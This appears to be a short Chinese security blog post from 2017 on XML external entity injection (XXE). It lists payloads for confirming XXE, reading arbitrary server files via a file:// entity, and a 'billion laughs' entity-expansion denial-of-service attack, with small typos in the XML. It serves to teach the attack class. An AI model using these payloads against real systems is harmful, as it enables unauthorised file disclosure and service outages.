【研究】XML外部实体注入(XXE)

在正式发布的2017 OWAST Top10榜单中，出现了三种新威胁：

A4：XML外部实体注入漏洞(XXE)

A8：不安全的反序列化漏洞

A10：不足的记录和监控漏洞

验证XXE：

构造请求

<?xml version="1.0" encoding="ytf-8"?>

<!DOCTYPE Anything[

<!ENTITY myentity "sectest">

<forgot><username>&myentity;</username></forgot>

查看输出是否为sectest

XXE的利用代码：

1、读取服务器任意文件

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [

<!ENTITY myentity SYSTEM "file:///location/anyfile" >]>

<abc>&myentity;</abc>

2、DDOS

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

posted @ 2017-12-02 09:52 Carrypan 阅读(715) 评论(0) 编辑收藏举报

刷新页面返回顶部

Carrypan

欢迎关注公众号：安全艺术

【研究】XML外部实体注入(XXE)